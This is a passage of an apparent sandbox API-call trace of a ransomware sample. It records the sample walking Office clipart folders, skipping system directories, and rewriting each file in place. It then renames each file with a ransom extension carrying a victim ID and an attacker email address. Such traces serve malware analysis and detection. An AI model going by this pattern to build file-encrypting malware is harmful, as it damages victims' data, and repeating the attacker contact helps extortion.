lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.652] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x900, lpOverlapped=0x0) returned 1 [0097.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0097.653] CloseHandle (hObject=0x314) returned 1 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0097.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0097.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0097.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0097.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.653] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0097.654] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02252_.WMF", cAlternateFileName="")) returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2=".") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="..") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="...") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="windows") returned -1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="recovery") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="perflogs") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="documents and settings") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="system volume information") returned -1 [0097.654] lstrcmpiW (lpString1="SO02252_.WMF", lpString2="msocache") returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02252_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02252_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02252_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02252_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0097.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0097.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0097.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3720) returned 1 [0097.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe80) returned 0x23fc98 [0097.702] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe80, lpOverlapped=0x0) returned 1 [0097.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.709] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe80, lpOverlapped=0x0) returned 1 [0097.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0097.709] CloseHandle (hObject=0x314) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0097.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0097.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0097.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0097.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0097.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0097.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0097.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0097.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0097.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02253_.WMF", cAlternateFileName="")) returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2=".") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="..") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="...") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="windows") returned -1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="recovery") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="perflogs") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="documents and settings") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="system volume information") returned -1 [0097.711] lstrcmpiW (lpString1="SO02253_.WMF", lpString2="msocache") returned 1 [0097.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0097.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02253_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02253_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0097.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0097.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2272) returned 1 [0097.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e0) returned 0x20c6c0 [0097.713] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0097.714] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.714] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0097.714] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0097.714] CloseHandle (hObject=0x314) returned 1 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0097.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0097.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0097.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0097.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.715] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0097.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0097.716] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x818, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02261_.WMF", cAlternateFileName="")) returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2=".") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="..") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="...") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="windows") returned -1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="recovery") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="perflogs") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="documents and settings") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="system volume information") returned -1 [0097.716] lstrcmpiW (lpString1="SO02261_.WMF", lpString2="msocache") returned 1 [0097.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0097.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02261_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0097.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0097.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02261_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0097.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0097.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0097.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0097.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.717] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2072) returned 1 [0097.717] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x810) returned 0x20c6c0 [0097.717] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x810, lpOverlapped=0x0) returned 1 [0097.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.719] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x810, lpOverlapped=0x0) returned 1 [0097.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0097.719] CloseHandle (hObject=0x314) returned 1 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0097.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0097.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 